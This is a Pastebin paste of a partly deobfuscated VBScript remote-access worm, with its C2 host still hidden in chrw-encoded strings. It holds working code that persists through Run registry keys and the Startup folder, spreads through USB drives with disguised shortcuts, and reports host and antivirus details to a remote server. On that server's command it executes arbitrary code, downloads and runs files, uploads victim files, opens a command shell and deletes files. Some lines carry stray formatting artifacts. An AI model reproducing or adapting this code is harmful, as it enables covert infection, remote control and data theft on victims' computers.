Deobfuscated

a guest
Apr 11th, 2016
255
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.91 KB | None | 0 0
  1. "host = chrw(53.5+53.5) & chrw(52.5+52.5) & chrw(55+55) & chrw(51.5+51.5) & chrw(56+56) & chrw(57+57) & chrw(55.5+55.5) & chrw(51.5+51.5) & chrw(23+23) & chrw(56+56) & chrw(58.5+58.5) & chrw(49+49) & chrw(54+54) & chrw(52.5+52.5) & chrw(49.5+49.5) & chrw(59+59) & chrw(54.5+54.5) & chrw(23+23) & chrw(49.5+49.5) & chrw(55.5+55.5) & chrw(54.5+54.5)" &
  2. "port = 88" &
  3. "installdir = chrw(18.5+18.5) & chrw(48.5+48.5) & chrw(56+56) & chrw(56+56) & chrw(50+50) & chrw(48.5+48.5) & chrw(58+58) & chrw(48.5+48.5) & chrw(18.5+18.5)"
  4. "lnkfile = false"
  5. "lnkfolder = false"
  6. "dim shellobj "
  7. "set shellobj = wscript.createobject(chrw(59.5+59.5) & chrw(57.5+57.5) & chrw(49.5+49.5) & chrw(57+57) & chrw(52.5+52.5) & chrw(56+56) & chrw(58+58) & chrw(23+23) & chrw(57.5+57.5) & chrw(52+52) & chrw(50.5+50.5) & chrw(54+54) & chrw(54+54))"
  8. "dim filesystemobj"
  9. "set filesystemobj = createobject(chrw(57.5+57.5) & chrw(49.5+49.5) & chrw(57+57) & chrw(52.5+52.5) & chrw(56+56) & chrw(58+58) & chrw(52.5+52.5) & chrw(55+55) & chrw(51.5+51.5) & chrw(23+23) & chrw(51+51) & chrw(52.5+52.5) & chrw(54+54) & chrw(50.5+50.5) & chrw(57.5+57.5) & chrw(60.5+60.5) & chrw(57.5+57.5) & chrw(58+58) & chrw(50.5+50.5) & chrw(54.5+54.5) & chrw(55.5+55.5) & chrw(49+49) & chrw(53+53) & chrw(50.5+50.5) & chrw(49.5+49.5) & chrw(58+58))"
  10. "dim httpobj"
  11. "set httpobj = createobject(chrw(54.5+54.5) & chrw(57.5+57.5) & chrw(60+60) & chrw(54.5+54.5) & chrw(54+54) & chrw(25+25) & chrw(23+23) & chrw(60+60) & chrw(54.5+54.5) & chrw(54+54) & chrw(52+52) & chrw(58+58) & chrw(58+58) & chrw(56+56))"
  12. "installname = wscript.scriptname"
  13. "startup = shellobj.specialfolders (""startup"") & ""\"""
  14. "installdir = shellobj.expandenvironmentstrings(installdir) & ""\"""
  15. "if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings(""%temp%"") & ""\"""
  16. "spliter = ""<"" & ""|"" & "">"""
  17. "sleep = 5000 "
  18. "dim response"
  19. "dim cmd"
  20. "dim param"
  21. "info = """""
  22. "usbspreading = """""
  23. "startdate = """""
  24. "dim oneonce"
  25. "on error resume next"
  26. "instance"
  27. "while true"
  28. "install"
  29. "response = """""
  30. "response = post (chrw(52.5+52.5) & chrw(57.5+57.5) & chrw(22.5+22.5) & chrw(57+57) & chrw(50.5+50.5) & chrw(48.5+48.5) & chrw(50+50) & chrw(60.5+60.5),"""")"
  31. "cmd = split (response,spliter)"
  32. "select case cmd (0)"
  33. "case chrw(50.5+50.5) & chrw(60+60) & chrw(49.5+49.5) & chrw(50.5+50.5) & chrw(49.5+49.5) & chrw(58.5+58.5) & chrw(58+58) & chrw(50.5+50.5)"
  34. " param = cmd (1)"
  35. " execute param"
  36. "case ""update"""
  37. " param = cmd (1)"
  38. " oneonce.close"
  39. " set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)"
  40. " oneonce.write param"
  41. " oneonce.close"
  42. " shellobj.run ""wscript.exe //B "" & chr(34) & installdir & installname & chr(34)"
  43. " wscript.quit "
  44. "case ""uninstall"""
  45. " uninstall"
  46. "case ""send"""
  47. " download cmd (1),cmd (2)"
  48. "case ""site-send"""
  49. " sitedownloader cmd (1),cmd (2)"
  50. "case ""recv"""
  51. " param = cmd (1)"
  52. " upload (param)"
  53. "case ""enum-driver"""
  54. " post ""is-enum-driver"",enumdriver "
  55. "case ""enum-faf"""
  56. " param = cmd (1)"
  57. " post ""is-enum-faf"",enumfaf (param)"
  58. "case ""enum-process"""
  59. " post ""is-enum-process"",enumprocess "
  60. "case ""cmd-shell"""
  61. " param = cmd (1)"
  62. " post ""is-cmd-shell"",cmdshell (param) "
  63. "case ""delete"""
  64. " param = cmd (1)"
  65. " deletefaf (param) "
  66. "case ""exit-process"""
  67. " param = cmd (1)"
  68. " exitprocess (param) "
  69. "case ""sleep"""
  70. " param = cmd (1)"
  71. " sleep = eval (param) "
  72. "end select"
  73. "wscript.sleep sleep"
  74. "wend"
  75. "sub install"
  76. "on error resume next"
  77. "dim lnkobj"
  78. "dim filename"
  79. "dim foldername"
  80. "dim fileicon"
  81. "dim foldericon"
  82. "upstart"
  83. "for each drive in filesystemobj.drives"
  84. "if drive.isready = true then"
  85. "if drive.freespace > 0 then"
  86. "if drive.drivetype = 1 then"
  87. " filesystemobj.copyfile wscript.scriptfullname , drive.path & ""\"" & installname,true"
  88. " if filesystemobj.fileexists (drive.path & ""\"" & installname) then"
  89. " filesystemobj.getfile(drive.path & ""\"" & installname).attributes = 2+4"
  90. " end if"
  91. " for each file in filesystemobj.getfolder( drive.path & ""\"" ).Files"
  92. " if not lnkfile then exit for"
  93. " if instr (file.name,""."") then"
  94. " if lcase (split(file.name, ""."") (ubound(split(file.name, ""."")))) <> ""lnk"" then"
  95. " file.attributes = 2+4"
  96. " if ucase (file.name) <> ucase (installname) then"
  97. " filename = split(file.name,""."")"
  98. " set lnkobj = shellobj.createshortcut (drive.path & ""\"" & filename (0) & "".lnk"") "
  99. " lnkobj.windowstyle = 7"
  100. " lnkobj.targetpath = ""cmd.exe"""
  101. " lnkobj.workingdirectory = """""
  102. " lnkobj.arguments = ""/c start "" & replace(installname,"" "", chrw(34) & "" "" & chrw(34)) & ""&start "" & replace(file.name,"" "", chrw(34) & "" "" & chrw(34)) &""&exit"""
  103. " fileicon = shellobj.regread (""HKEY_LOCAL_MACHINE\software\classes\"" & shellobj.regread (""HKEY_LOCAL_MACHINE\software\classes\."" & split(file.name, ""."")(ubound(split(file.name, ""."")))& ""\"") & ""\defaulticon\"") "
  104. " if instr (fileicon,"","") = 0 then"
  105. " lnkobj.iconlocation = file.path"
  106. " else "
  107. " lnkobj.iconlocation = fileicon"
  108. " end if"
  109. " lnkobj.save()"
  110. " end if"
  111. " end if"
  112. " end if"
  113. " next"
  114. " for each folder in filesystemobj.getfolder( drive.path & ""\"" ).subfolders"
  115. " if not lnkfolder then exit for"
  116. " folder.attributes = 2+4"
  117. " foldername = folder.name"
  118. " set lnkobj = shellobj.createshortcut (drive.path & ""\"" & foldername & "".lnk"") "
  119. " lnkobj.windowstyle = 7"
  120. " lnkobj.targetpath = ""cmd.exe"""
  121. " lnkobj.workingdirectory = """""
  122. " lnkobj.arguments = ""/c start "" & replace(installname,"" "", chrw(34) & "" "" & chrw(34)) & ""&start explorer "" & replace(folder.name,"" "", chrw(34) & "" "" & chrw(34)) &""&exit"""
  123. " foldericon = shellobj.regread (""HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\"") "
  124. " if instr (foldericon,"","") = 0 then"
  125. " lnkobj.iconlocation = folder.path"
  126. " else "
  127. " lnkobj.iconlocation = foldericon"
  128. " end if"
  129. " lnkobj.save()"
  130. " next"
  131. "end If"
  132. "end If"
  133. "end if"
  134. "next"
  135. "err.clear"
  136. "end sub"
  137. "sub uninstall"
  138. "on error resume next"
  139. "dim filename"
  140. "dim foldername"
  141. "shellobj.regdelete ""HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\"" & split (installname,""."")(0)"
  142. "shellobj.regdelete ""HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\"" & split (installname,""."")(0)"
  143. "filesystemobj.deletefile startup & installname ,true"
  144. "filesystemobj.deletefile wscript.scriptfullname ,true"
  145. "for each drive in filesystemobj.drives"
  146. "if drive.isready = true then"
  147. "if drive.freespace > 0 then"
  148. "if drive.drivetype = 1 then"
  149. " for each file in filesystemobj.getfolder ( drive.path & ""\"").files"
  150. " on error resume next"
  151. " if instr (file.name,""."") then"
  152. " if lcase (split(file.name, ""."")(ubound(split(file.name, ""."")))) <> ""lnk"" then"
  153. " file.attributes = 0"
  154. " if ucase (file.name) <> ucase (installname) then"
  155. " filename = split(file.name,""."")"
  156. " filesystemobj.deletefile (drive.path & ""\"" & filename(0) & "".lnk"" )"
  157. " else"
  158. " filesystemobj.deletefile (drive.path & ""\"" & file.name)"
  159. " end If"
  160. " else"
  161. " filesystemobj.deletefile (file.path) "
  162. " end if"
  163. " end if"
  164. " next"
  165. " for each folder in filesystemobj.getfolder( drive.path & ""\"" ).subfolders"
  166. " folder.attributes = 0"
  167. " next"
  168. "end if"
  169. "end if"
  170. "end if"
  171. "next"
  172. "wscript.quit"
  173. "end sub"
  174. "function post (cmd ,param)"
  175. "post = param"
  176. "httpobj.open ""post"",""http://"" & host & "":"" & port &""/"" & cmd, false"
  177. "httpobj.setrequestheader ""user-agent:"",information"
  178. "httpobj.send param"
  179. "post = httpobj.responsetext"
  180. "end function"
  181. "function information"
  182. "on error resume next"
  183. "if inf = """" then"
  184. " inf = hwid & spliter "
  185. " inf = inf & shellobj.expandenvironmentstrings(""%computername%"") & spliter "
  186. " inf = inf & shellobj.expandenvironmentstrings(""%username%"") & spliter"
  187. " set root = getobject(""winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2"")"
  188. " set os = root.execquery (""select * from win32_operatingsystem"")"
  189. " for each osinfo in os"
  190. " inf = inf & osinfo.caption & spliter "
  191. " exit for"
  192. " next"
  193. " inf = inf & ""plus"" & spliter"
  194. " inf = inf & security & spliter"
  195. " inf = inf & usbspreading"
  196. " information = inf "
  197. "else"
  198. " information = inf"
  199. "end if"
  200. "end function"
  201. "sub upstart ()"
  202. "on error resume Next"
  203. "shellobj.regwrite ""HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\"" & split (installname,""."")(0), ""wscript.exe //B "" & chrw(34) & installdir & installname & chrw(34) , ""REG_SZ"""
  204. "shellobj.regwrite ""HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\"" & split (installname,""."")(0), ""wscript.exe //B "" & chrw(34) & installdir & installname & chrw(34) , ""REG_SZ"""
  205. "filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true"
  206. "filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true"
  207. "end sub"
  208. "function hwid"
  209. "on error resume next"
  210. "set root = getobject(""winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2"")"
  211. "set disks = root.execquery (""select * from win32_logicaldisk"")"
  212. "for each disk in disks"
  213. " if disk.volumeserialnumber <> """" then"
  214. " hwid = disk.volumeserialnumber"
  215. " exit for"
  216. " end if"
  217. "next"
  218. "end function"
  219. "function security "
  220. "on error resume next"
  221. "security = """""
  222. "set objwmiservice = getobject(""winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2"")"
  223. "set colitems = objwmiservice.execquery(""select * from win32_operatingsystem"",,48)"
  224. "for each objitem in colitems"
  225. " versionstr = split (objitem.version,""."")"
  226. "next"
  227. "versionstr = split (colitems.version,""."")"
  228. "osversion = versionstr (0) & ""."""
  229. "for x = 1 to ubound (versionstr)"
  230. & " osversion = osversion & versionstr (i)"
  231. "next"
  232. "osversion = eval (osversion)"
  233. "if osversion > 6 then sc = ""securitycenter2"" else sc = ""securitycenter"""
  234. "set objsecuritycenter = getobject(""winmgmts:\\localhost\root\"" & sc)"
  235. "Set colantivirus = objsecuritycenter.execquery(""select * from antivirusproduct"",""wql"",0)"
  236. "for each objantivirus in colantivirus"
  237. " security = security & objantivirus.displayname & "" ."""
  238. "next"
  239. "if security = """" then security = ""nan-av"""
  240. "end function"
  241. "function instance"
  242. "on error resume next"
  243. "usbspreading = shellobj.regread (""HKEY_LOCAL_MACHINE\software\"" & split (installname,""."")(0) & ""\"")"
  244. "if usbspreading = """" then"
  245. " if lcase ( mid(wscript.scriptfullname,2)) = "":\"" & lcase(installname) then"
  246. " usbspreading = ""true - "" & date"
  247. " shellobj.regwrite ""HKEY_LOCAL_MACHINE\software\"" & split (installname,""."")(0) & ""\"", usbspreading, ""REG_SZ"""
  248. " else"
  249. " usbspreading = ""false - "" & date"
  250. " shellobj.regwrite ""HKEY_LOCAL_MACHINE\software\"" & split (installname,""."")(0) & ""\"", usbspreading, ""REG_SZ"""
  251. " end if"
  252. "end If"
  253. "upstart"
  254. "set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)"
  255. "set installfullnameshort = filesystemobj.getfile (installdir & installname)"
  256. "if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then "
  257. " shellobj.run ""wscript.exe //B "" & chr(34) & installdir & installname & Chr(34)"
  258. " wscript.quit "
  259. "end If"
  260. "err.clear"
  261. "set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)"
  262. "if err.number > 0 then wscript.quit"
  263. "end function"
  264. "sub sitedownloader (fileurl,filename)"
  265. "strlink = fileurl"
  266. "strsaveto = installdir & filename"
  267. "set objhttpdownload = createobject(""msxml2.xmlhttp"" )"
  268. "objhttpdownload.open ""get"", strlink, false"
  269. "objhttpdownload.send"
  270. "set objfsodownload = createobject (""scripting.filesystemobject"")"
  271. "if objfsodownload.fileexists (strsaveto) then"
  272. " objfsodownload.deletefile (strsaveto)"
  273. "end if"
  274. " "
  275. "if objhttpdownload.status = 200 then"
  276. " dim objstreamdownload"
  277. " set objstreamdownload = createobject(""adodb.stream"")"
  278. " with objstreamdownload"
  279. & & ".type = 1 "
  280. & & ".open"
  281. & & ".write objhttpdownload.responsebody"
  282. & & ".savetofile strsaveto"
  283. & & ".close"
  284. " end with"
  285. " set objstreamdownload = nothing"
  286. "end if"
  287. "if objfsodownload.fileexists(strsaveto) then"
  288. " shellobj.run objfsodownload.getfile (strsaveto).shortpath"
  289. "end if "
  290. "end sub"
  291. "sub download (fileurl,filedir)"
  292. "if filedir = """" then "
  293. " filedir = installdir"
  294. "end if"
  295. "strsaveto = filedir & mid (fileurl, instrrev (fileurl,""\"") + 1)"
  296. "set objhttpdownload = createobject(""msxml2.xmlhttp"")"
  297. "objhttpdownload.open ""post"",""http://"" & host & "":"" & port &""/"" & ""is-sending"" & spliter & fileurl, false"
  298. "objhttpdownload.send """""
  299. " "
  300. "set objfsodownload = createobject (""scripting.filesystemobject"")"
  301. "if objfsodownload.fileexists (strsaveto) then"
  302. " objfsodownload.deletefile (strsaveto)"
  303. "end if"
  304. "if objhttpdownload.status = 200 then"
  305. " dim objstreamdownload"
  306. & "set objstreamdownload = createobject(""adodb.stream"")"
  307. " with objstreamdownload "
  308. & & " .type = 1 "
  309. & & " .open"
  310. & & " .write objhttpdownload.responsebody"
  311. & & " .savetofile strsaveto"
  312. & & " .close"
  313. & "end with"
  314. " set objstreamdownload = nothing"
  315. "end if"
  316. "if objfsodownload.fileexists(strsaveto) then"
  317. " shellobj.run objfsodownload.getfile (strsaveto).shortpath"
  318. "end if "
  319. "end sub"
  320. "function upload (fileurl)"
  321. "dim httpobj,objstreamuploade,buffer"
  322. "set objstreamuploade = createobject(""adodb.stream"")"
  323. "with objstreamuploade "
  324. " .type = 1 "
  325. " .open"
  326. & " .loadfromfile fileurl"
  327. & " buffer = .read"
  328. & " .close"
  329. "end with"
  330. "set objstreamdownload = nothing"
  331. "set httpobj = createobject(""msxml2.xmlhttp"")"
  332. "httpobj.open ""post"",""http://"" & host & "":"" & port &""/"" & ""is-recving"" & spliter & fileurl, false"
  333. "httpobj.send buffer"
  334. "end function"
  335. "function enumdriver ()"
  336. "for each drive in filesystemobj.drives"
  337. "if drive.isready = true then"
  338. " enumdriver = enumdriver & drive.path & ""|"" & drive.drivetype & spliter"
  339. "end if"
  340. "next"
  341. "end Function"
  342. "function enumfaf (enumdir)"
  343. "enumfaf = enumdir & spliter"
  344. "for each folder in filesystemobj.getfolder (enumdir).subfolders"
  345. " enumfaf = enumfaf & folder.name & ""|"" & """" & ""|"" & ""d"" & ""|"" & folder.attributes & spliter"
  346. "next"
  347. "for each file in filesystemobj.getfolder (enumdir).files"
  348. " enumfaf = enumfaf & file.name & ""|"" & file.size & ""|"" & ""f"" & ""|"" & file.attributes & spliter"
  349. "next"
  350. "end function"
  351. "function enumprocess ()"
  352. "on error resume next"
  353. "set objwmiservice = getobject(""winmgmts:\\.\root\cimv2"")"
  354. "set colitems = objwmiservice.execquery(""select * from win32_process"",,48)"
  355. "dim objitem"
  356. "for each objitem in colitems"
  357. & "enumprocess = enumprocess & objitem.name & ""|"""
  358. & "enumprocess = enumprocess & objitem.processid & ""|"""
  359. " enumprocess = enumprocess & objitem.executablepath & spliter"
  360. "next"
  361. "end function"
  362. "sub exitprocess (pid)"
  363. "on error resume next"
  364. "shellobj.run ""taskkill /F /T /PID "" & pid,7,true"
  365. "end sub"
  366. "sub deletefaf (url)"
  367. "on error resume next"
  368. "filesystemobj.deletefile url"
  369. "filesystemobj.deletefolder url"
  370. "end sub"
  371. "function cmdshell (cmd)"
  372. "dim httpobj,oexec,readallfromany"
  373. "set oexec = shellobj.exec (""%comspec% /c "" & cmd)"
  374. "if not oexec.stdout.atendofstream then"
  375. " readallfromany = oexec.stdout.readall"
  376. "elseif not oexec.stderr.atendofstream then"
  377. " readallfromany = oexec.stderr.readall"
  378. "else "
  379. " readallfromany = """""
  380. "end if"
  381. "cmdshell = readallfromany"
  382. "end function"